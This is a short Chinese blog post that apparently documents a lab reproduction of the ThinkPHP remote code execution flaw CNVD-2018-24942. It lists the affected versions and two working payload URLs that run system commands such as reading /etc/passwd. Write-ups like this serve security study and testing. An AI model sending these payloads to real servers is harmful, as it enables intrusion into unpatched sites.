thinkphp 代码执行 (CNVD-2018-24942)

风中追风-fzzf

于 2024-07-25 11:41:50 发布

阅读量197

点赞数 2

分类专栏： # 命令执行文章标签： web安全

本文链接：https://blog.csdn.net/qq_23003811/article/details/140685729

版权

24 篇文章 0 订阅

订阅专栏

一、漏洞概述

ThinkPHP框架 - 是由上海顶想公司开发维护的MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。该漏洞由于框架对控制器名未能进行足够的检测，攻击者利用该漏洞对目标网站进行远程命令执行攻击。

二、影响范围

ThinkPHP <5.1.31

ThinkPHP <=5.0.23

三、访问页面

四、漏洞复现

1、执行payload

/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /etc/passwd

2、获取flag

/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /tmp

关注

专栏目录